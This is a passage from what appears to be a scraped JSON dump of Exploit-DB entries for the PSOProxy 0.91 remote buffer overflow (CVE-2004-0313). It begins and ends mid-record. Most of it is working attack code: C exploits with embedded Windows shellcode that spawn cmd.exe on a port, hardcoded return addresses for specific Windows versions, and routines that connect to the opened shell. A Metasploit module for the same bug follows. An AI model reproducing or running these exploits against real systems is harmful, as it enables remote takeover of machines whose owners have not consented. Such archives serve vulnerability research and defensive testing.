teckniques du socket\r\n\r\nsystem(\"cls\"); // on efface l'<E9>cran pour faire joli\r\nintro();\r\n\r\nif(argc!=3) {\r\nprintf(\"\\nUsage : %s <ip> <port>\\n\",argv[0]);\r\nexit(-1);\r\n}\r\n\r\n\r\n_snprintf(ip, 24, \"%s\", argv[1]);\r\n\r\n\r\nWSAStartup(MAKEWORD(2,0), &WSAData); // on startup :-)\r\nsinf.sin_addr.s_addr = inet_addr(ip); // IP :)\r\nsinf.sin_family = AF_INET; // \"Famille du socket\"\r\nsinf.sin_port = htons(atoi(argv[2])); // PORT ! oooooh :>\r\nsock = socket(AF_INET,SOCK_STREAM,0); // Cr<E9>ation du socket en temps que tel\r\n\r\nbind(sock, (SOCKADDR *)&sinf, sizeof(sinf)); // On attache le socket a l'adresse et le port qu'on a d<E9>fini\r\nconnect(sock, (SOCKADDR *)&sinf, sizeof(sinf));\r\n\r\nsprintf(buffer,\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAA\\x0F\\x98\\xF8\\x77%s\\r\\n\",shellcode);// 77F8980F \\x0F\\x98\\xF8\\x77\r\n\r\nsend(sock,buffer,3000,0);\r\nprintf(\" Exploit envoye... tester le port 4444\\n\\n\");\r\nclosesocket(sock);\r\nWSACleanup();\r\n\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23732/"}, {"lastseen": "2016-02-02T21:40:58", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2). CVE-2004-0313. Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23733", "href": "https://www.exploit-db.com/exploits/23733/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n \r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n \r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. \r\n\r\n/*\r\n * PSOProxy remote stack-based overflow\r\n * by Li0n7@voila.fr\r\n * Bug found by Donato Ferrante <fdonato@autistici.org>\r\n * Spawns cmd.exe on port 9191\r\n *\r\n * usage: ./PSOProxy-exp -h <victim> -p <port> -t <target>\r\n * Platforms supported are:\r\n * 0 - XP SP1 FR - PSOProxy 0.91 - 0x77d615b9\r\n *\r\n * $./PSOProxy-exp -h 192.168.0.1 -p 8080 -t 0\r\n * PSOProxy <= 0.91 remote exploit\r\n * Bug found by Donato Ferrante <fdonato@autistici.org>\r\n * Exploit written by Li0n7 <Li0n7@voila.fr>\r\n *\r\n * [+] Connected to 192.168.0.1:8080.\r\n * [+] Building evil string to send (0x77d615b9).\r\n * [+] Here's your shell, have fun!\r\n * Microsoft Windows XP [version 5.1.2600]\r\n * (C) Copyright 1985-2001 Microsoft Corp.\r\n *\r\n * C:\\Program Files\\psoproxy-x86-win32-0.91>\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n\r\n#define BACK 9191\r\n#define D_PORT 8080\r\n#define SIZE 2048\r\n#define JMP_ESP 0x77D4643D // USER32.DLL JMP ESP addr\r\n\r\n//ripped shellcode from ?\r\n\r\nchar shellcode[] =\r\n \"\\xEB\\x03\\x5D\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\x8B\\xC5\\x83\\xC0\\x11\\x33\"\r\n \"\\xC9\\x66\\xB9\\xC9\\x01\\x80\\x30\\x88\\x40\\xE2\\xFA\\xDD\\x03\\x64\\x03\\x7C\"\r\n \"\\x09\\x64\\x08\\x88\\x88\\x88\\x60\\xC4\\x89\\x88\\x88\\x01\\xCE\\x74\\x77\\xFE\"\r\n \"\\x74\\xE0\\x06\\xC6\\x86\\x64\\x60\\xD9\\x89\\x88\\x88\\x01\\xCE\\x4E\\xE0\\xBB\"\r\n \"\\xBA\\x88\\x88\\xE0\\xFF\\xFB\\xBA\\xD7\\xDC\\x77\\xDE\\x4E\\x01\\xCE\\x70\\x77\"\r\n \"\\xFE\\x74\\xE0\\x25\\x51\\x8D\\x46\\x60\\xB8\\x89\\x88\\x88\\x01\\xCE\\x5A\\x77\"\r\n \"\\xFE\\x74\\xE0\\xFA\\x76\\x3B\\x9E\\x60\\xA8\\x89\\x88\\x88\\x01\\xCE\\x46\\x77\"\r\n \"\\xFE\\x74\\xE0\\x67\\x46\\x68\\xE8\\x60\\x98\\x89\\x88\\x88\\x01\\xCE\\x42\\x77\"\r\n \"\\xFE\\x70\\xE0\\x43\\x65\\x74\\xB3\\x60\\x88\\x89\\x88\\x88\\x01\\xCE\\x7C\\x77\"\r\n \"\\xFE\\x70\\xE0\\x51\\x81\\x7D\\x25\\x60\\x78\\x88\\x88\\x88\\x01\\xCE\\x78\\x77\"\r\n \"\\xFE\\x70\\xE0\\x2C\\x92\\xF8\\x4F\\x60\\x68\\x88\\x88\\x88\\x01\\xCE\\x64\\x77\"\r\n \"\\xFE\\x70\\xE0\\x2C\\x25\\xA6\\x61\\x60\\x58\\x88\\x88\\x88\\x01\\xCE\\x60\\x77\"\r\n \"\\xFE\\x70\\xE0\\x6D\\xC1\\x0E\\xC1\\x60\\x48\\x88\\x88\\x88\\x01\\xCE\\x6A\\x77\"\r\n \"\\xFE\\x70\\xE0\\x6F\\xF1\\x4E\\xF1\\x60\\x38\\x88\\x88\\x88\\x01\\xCE\\x5E\\xBB\"\r\n \"\\x77\\x09\\x64\\x7C\\x89\\x88\\x88\\xDC\\xE0\\x89\\x89\\x88\\x88\\x77\\xDE\\x7C\"\r\n \"\\xD8\\xD8\\xD8\\xD8\\xC8\\xD8\\xC8\\xD8\\x77\\xDE\\x78\\x03\\x50\\xDF\\xDF\\xE0\"\r\n \"\\x8A\\x88\\xAB\\x6F\\x03\\x44\\xE2\\x9E\\xD9\\xDB\\x77\\xDE\\x64\\xDF\\xDB\\x77\"\r\n \"\\xDE\\x60\\xBB\\x77\\xDF\\xD9\\xDB\\x77\\xDE\\x6A\\x03\\x58\\x01\\xCE\\x36\\xE0\"\r\n \"\\xEB\\xE5\\xEC\\x88\\x01\\xEE\\x4A\\x0B\\x4C\\x24\\x05\\xB4\\xAC\\xBB\\x48\\xBB\"\r\n \"\\x41\\x08\\x49\\x9D\\x23\\x6A\\x75\\x4E\\xCC\\xAC\\x98\\xCC\\x76\\xCC\\xAC\\xB5\"\r\n \"\\x01\\xDC\\xAC\\xC0\\x01\\xDC\\xAC\\xC4\\x01\\xDC\\xAC\\xD8\\x05\\xCC\\xAC\\x98\"\r\n \"\\xDC\\xD8\\xD9\\xD9\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\x77\\xFE\\x4A\\xD9\\x77\\xDE\"\r\n \"\\x46\\x03\\x44\\xE2\\x77\\x77\\xB9\\x77\\xDE\\x5A\\x03\\x40\\x77\\xFE\\x36\\x77\"\r\n \"\\xDE\\x5E\\x63\\x16\\x77\\xDE\\x9C\\xDE\\xEC\\x29\\xB8\\x88\\x88\\x88\\x03\\xC8\"\r\n \"\\x84\\x03\\xF8\\x94\\x25\\x03\\xC8\\x80\\xD6\\x4A\\x8C\\x88\\xDB\\xDD\\xDE\\xDF\"\r\n \"\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\\xF0\\x8B\\x5D\\x03\\xC2\\x90\"\r\n \"\\x03\\xD2\\xA8\\x8B\\x55\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x8B\\x7D\\xBB\\x77\\x74\"\r\n \"\\xBB\\x48\\x24\\xB2\\x4C\\xFC\\x8F\\x49\\x47\\x85\\x8B\\x70\\x63\\x7A\\xB3\\xF4\"\r\n \"\\xAC\\x9C\\xFD\\x69\\x03\\xD2\\xAC\\x8B\\x55\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\"\r\n \"\\x8B\\x55\\x03\\x8C\\x03\\x8B\\x4D\\x63\\x8A\\xBB\\x48\\x03\\x5D\\xD7\\xD6\\xD5\"\r\n \"\\xD3\\x4A\\x8C\\x88\";\r\n\r\nstruct os_ret_addr\r\n{\r\n int num;\r\n char *plat;\r\n long ret;\r\n};\r\n\r\nstruct os_ret_addr exp_os[]=\r\n{\r\n{0,\"XP SP1 FR - PSOProxy 0.91\", 0x77D615B9}, // USER32.DLL jmp esp addr\r\n{0,NULL,0},\r\n};\r\n\r\nchar *build(long ret);\r\nint back_connection(long host);\r\nvoid send_evil(int fd,char evil[]);\r\nint set_connection(long host,int port);\r\nlong resolve_host(u_char *host_name);\r\nvoid die(char *argv);\r\n\r\nint\r\nmain(int argc,char *argv[])\r\n{\r\n int i, option, fd, port = D_PORT;\r\n long host = 0, ret = JMP_ESP;\r\n char * option_list = \"h:p:t:\", buffer[SIZE];\r\n\r\n opterr = 0;\r\n\r\n fprintf(stdout,\"PSOProxy <= 0.91 remote exploit\\r\\n\");\r\n fprintf(stdout,\"Bug found by Donato Ferrante <fdonato@autistici.org>\\r\\n\");\r\n fprintf(stdout,\"Exploit written by Li0n7 <Li0n7@voila.fr>\\r\\n\\n\");\r\n\r\n if (argc < 2) die(argv[0]);\r\n\r\n while((option = getopt(argc,argv,option_list)) != -1)\r\n switch(option)\r\n {\r\n case 'h':\r\n host = resolve_host(optarg);\r\n if(!host)\r\n {\r\n fprintf(stderr,\"[-] Host address incorrect.\\n\");\r\n exit(0);\r\n }\r\n break;\r\n case 'p':\r\n port = atoi(optarg);\r\n if(port > 65535 || port < 0) exit(1);\r\n break;\r\n case 't':\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n if(atoi(optarg) > i || atoi(optarg) < 0)\r\n {\r\n fprintf(stderr,\"Platforms supported are:\\n\");\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n fprintf(stderr,\"\\t%i - %s - 0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);\r\n exit(1);\r\n }\r\n ret = exp_os[atoi(optarg)].ret;\r\n break;\r\n case '?':\r\n fprintf(stderr,\"[-] option \\'%c\\' unknown\\n\",optopt);\r\n die(argv[0]);\r\n }\r\n\r\n fd = set_connection(host,port);\r\n strncpy(buffer,build(ret),SIZE-1);\r\n buffer[SIZE-1] = '\\0';\r\n send_evil(fd,buffer);\r\n back_connection(host);\r\n return 0;\r\n}\r\n\r\nchar\r\n*build(long ret)\r\n{\r\n char *buffer,*ptr,*request;\r\n int i;\r\n long *addr_ptr;\r\n\r\n fprintf(stdout,\"[+] Building evil string to send (0x%x).\\n\",ret);\r\n buffer = (char *)malloc(SIZE);\r\n request = (char *)malloc(SIZE+4);\r\n\r\n if(!buffer || !request)\r\n {\r\n fprintf(stderr,\"[-] Can't allocate memory, exiting...\\n\");\r\n exit(0);\r\n }\r\n\r\n ptr = buffer;\r\n memset(ptr,0x41,1024);\r\n ptr += 1024;\r\n\r\n addr_ptr = (long *)ptr;\r\n *(addr_ptr++) = ret;\r\n ptr = (char *)addr_ptr;\r\n\r\n memset(ptr,0x90,20);\r\n ptr += 20;\r\n memcpy(ptr,shellcode,strlen(shellcode));\r\n ptr += strlen(shellcode);\r\n\r\n snprintf(request,SIZE+64,\"%s\\r\\n\",buffer);\r\n return request;\r\n}\r\n\r\n\r\nint\r\nback_connection(long host)\r\n{\r\n struct sockaddr_in s;\r\n u_char sock_buf[4096];\r\n fd_set fds;\r\n int fd,size;\r\n char *command=\"ver\\n\";\r\n\r\n fd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (fd < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n exit(0);\r\n }\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_port = htons(BACK);\r\n s.sin_addr.s_addr = host;\r\n\r\n if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n return 0;\r\n }\r\n\r\n fprintf(stdout, \"[+] Here's your shell, have fun!\\n\\n\");\r\n\r\n size = send(fd, command, strlen(command), 0);\r\n if(size < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n for (;;)\r\n {\r\n FD_ZERO(&fds);\r\n FD_SET(0, &fds);\r\n FD_SET(fd, &fds);\r\n\r\n if (select(255, &fds, NULL, NULL, NULL) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n memset(sock_buf, 0, sizeof(sock_buf));\r\n\r\n if (FD_ISSET(fd, &fds))\r\n {\r\n if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)\r\n {\r\n fprintf(stderr, \"[-] Connection closed by remote host.\\n\");\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n fprintf(stderr, \"%s\", sock_buf);\r\n }\r\n\r\n if (FD_ISSET(0, &fds))\r\n {\r\n read(0, sock_buf, sizeof(sock_buf));\r\n write(fd, sock_buf, strlen(sock_buf));\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\nvoid\r\nsend_evil(int fd,char evil[SIZE+64])\r\n{\r\n int size;\r\n size = send(fd, evil, strlen(evil), 0);\r\n if(size < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n sleep(1);\r\n return;\r\n}\r\n\r\n\r\nint\r\nset_connection(long host,int port)\r\n{\r\n struct sockaddr_in s;\r\n struct hostent * hoste;\r\n int fd,size;\r\n\r\n fd = socket(AF_INET,SOCK_STREAM,0);\r\n if(fd < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n exit(0);\r\n }\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_addr.s_addr = host;\r\n s.sin_port = htons(port);\r\n\r\n if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n fprintf(stdout,\"[+] Connected to %s:%i.\\n\",inet_ntoa(s.sin_addr.s_addr),port);\r\n\r\n sleep(1);\r\n return fd;\r\n\r\n}\r\n\r\nlong resolve_host(u_char *host_name)\r\n{\r\n struct in_addr addr;\r\n struct hostent *host_ent;\r\n\r\n addr.s_addr = inet_addr(host_name);\r\n if (addr.s_addr == -1)\r\n {\r\n host_ent = gethostbyname(host_name);\r\n if (!host_ent) return(0);\r\n memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);\r\n }\r\n\r\n return(addr.s_addr);\r\n}\r\n\r\nvoid\r\ndie(char *argv)\r\n{\r\n int i;\r\n fprintf(stdout,\"usage: %s -h <victim> -p <port> -t <target>\\n\",argv);\r\n fprintf(stderr,\"Platforms supported are:\\n\");\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n fprintf(stderr,\"\\t%i - %s - 0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);\r\n exit(1);\r\n}\r\n\r\n/* A poil! */\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23733/"}, {"lastseen": "2016-02-02T21:41:07", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (3). CVE-2004-0313. Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23734", "href": "https://www.exploit-db.com/exploits/23734/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n \r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n \r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. \r\n\r\n/*******************************************************\r\n* PSO v0.91 Remote exploit *\r\n* by NoRpiUs *\r\n* *\r\n* web: www.norpius.tk *\r\n* email: norpius@altervista.org *\r\n* *\r\n*******************************************************/ \r\n\r\n#include <stdio.h>\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <windows.h>\r\n #define close closesocket\r\n#else\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\nunsigned char shellcode[] = \r\n\r\n \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"\r\n \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"\r\n \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"\r\n \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"\r\n \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"\r\n \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"\r\n \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"\r\n \"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"\r\n \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"\r\n \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"\r\n \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"\r\n \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"\r\n \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x60\"\r\n \"\\x6a\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x23\\xff\\xff\\xff\\x89\"\r\n \"\\xc6\\x31\\xdb\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x31\\xdb\\x56\\x56\"\r\n \"\\x56\\x53\\x53\\x31\\xc0\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\"\r\n \"\\x53\\x53\\x53\\x6a\\x44\\x89\\xe0\\x53\\x53\\x53\\x53\\x54\\x50\\x53\\x53\\x53\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\x51\\x53\\x87\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xdf\"\r\n \"\\xfe\\xff\\xff\\x5b\\x31\\xc0\\x48\\x50\\x53\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xcf\"\r\n \"\\xfe\\xff\\xff\\x56\\x87\\xef\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc2\\xfe\\xff\\xff\"\r\n \"\\x83\\xc4\\x5c\\x61\\xeb\\x89\\x41\\r\\n\";\r\n\r\n\r\nvoid errore( char *err )\r\n{\r\n\tprintf(\"%s\",err);\r\n\texit(1);\r\n}\r\n\r\nvoid connectz( char *host)\r\n{\r\n\tchar comando[30000];\r\n\tsleep(5000);\r\n\tsprintf(comando, \"telnet %s 28876\", host);\r\n\tsystem(comando);\r\n}\r\n\r\nvoid banner(void)\r\n{\r\n\tfputs(\"\\n\\tPSO Remote exploit\\n\"\r\n\t \"\\tBy NoRpiUs\\n\"\r\n\t \"\\tweb: www.norpius.tk\\n\"\r\n\t \"\\temail: norpius@altervista.org\\n\\n\", stdout);\r\n}\r\n\r\nvoid uso( char *progz )\r\n{\t\r\n\tprintf(\"Uso: <host> <porta> <target>\\n\\n\");\r\n\tprintf(\"\\tTarget: \\n\"\r\n \"\\t1 = Win2k ITA SP4 \\n\"\r\n \"\\t2 = WinXP ITA SP0(1)\\n\"\r\n \"\\t3 = WinXP ITA SP0(2)\\n\");\r\n\texit(1);\r\n}\r\n\r\nint main( int argc, char *argv[] )\r\n{\r\n\tint sock;\r\n\tstruct hostent *he;\r\n\tstruct sockaddr_in target;\r\n\tunsigned char evilbuff[1530];\r\n\tlong retaddr1 = 0x796C7DDC; \r\n long retaddr2 = 0x77E7FC79; \r\n long retaddr3 = 0x77EB1933; \r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(2,0), &wsadata);\r\n#endif\r\n\r\n\tbanner();\r\n\tif ( argc < 4 ) uso(argv[0]);\r\n\r\n\tif ( (he = gethostbyname(argv[1])) == NULL )\r\n\t\terrore(\"\\t[-] Impossibile risolvere l'host\\n\");\r\n\r\n\ttarget.sin_family = AF_INET;\r\n\ttarget.sin_addr = *(( struct in_addr *) he -> h_addr );\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tfputs(\"\\t[+] Preparazione del buffer...\\n\", stdout);\r\n\r\n\tmemset(evilbuff, 0x41, 1040 );\r\n\t\r\n switch(argv[3][0]) \r\n {\r\n case '1': memcpy(evilbuff + 1024, (unsigned char *) &retaddr1, 4); break;\r\n case '2': memcpy(evilbuff + 1024, (unsigned char *) &retaddr2, 4); break;\r\n case '3': memcpy(evilbuff + 1024, (unsigned char *) &retaddr3, 4); break;\r\n default : errore(\"[-] Target sbagliato\\n\"); \r\n }\r\n\t\r\n\tmemcpy(evilbuff + 1040, shellcode, sizeof(shellcode)); \r\n\t\r\n\tfputs(\"\\t[+] Connessione...\\n\", stdout);\r\n\r\n\tif ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )\r\n\t\terrore(\"\\t[-] Impossibile creare socket\\n\");\r\n\r\n\tif ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )\r\n\t\terrore(\"\\t[-] Connessione fallita\\n\");\r\n\r\n\tif ( send( sock, evilbuff, sizeof(evilbuff), 0) < 0 )\r\n\t\terrore(\"\\t[-] Impossibile spedire il buffer\\n\");\r\n\r\n\tclose(sock);\r\n\r\n\tfputs(\"\\t[+] Buffer spedito!\\n\", stdout);\r\n\tfputs(\"\\t[+] In attesa della connessione...\\n\\n\", stdout);\r\n\r\n\tconnectz(argv[1]);\r\n\r\n\treturn(0);\r\n\r\n}\r\n\r\n\t\r\n\t\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23734/"}, {"lastseen": "2016-02-02T06:30:53", "description": "PSO Proxy v0.91 Stack Buffer Overflow. CVE-2004-0313. Dos exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "PSO Proxy 0.91 - Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16790", "href": "https://www.exploit-db.com/exploits/16790/", "sourceData": "##\r\n# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in the PSO Proxy v0.91 web server.\r\n\t\t\t\tIf a client sends an excessively long string the stack is overwritten.\r\n\t\t\t},\r\n\t\t\t'Author' => 'Patrick Webster <patrick@aushack.com>',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2004-0313' ],\r\n\t\t\t\t\t[ 'OSVDB', '4028' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/156' ],\r\n\t\t\t\t\t[ 'BID', '9706' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 370,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP Pro SP2 English',\t { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Feb 20 2004'\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\r\n\t\tbanner = sock.get(-1,3)\r\n\t\tif (banner =~ /PSO Proxy 0\\.9/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\texploit = rand_text_alphanumeric(1024, payload_badchars)\r\n\t\texploit += [target['Ret']].pack('V') + payload.encoded\r\n\r\n\t\tsock.put(exploit + \"\\r\\n\\r\\n\")\r\n\r\n\t\tdisconnect\r\n\t\thandler\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 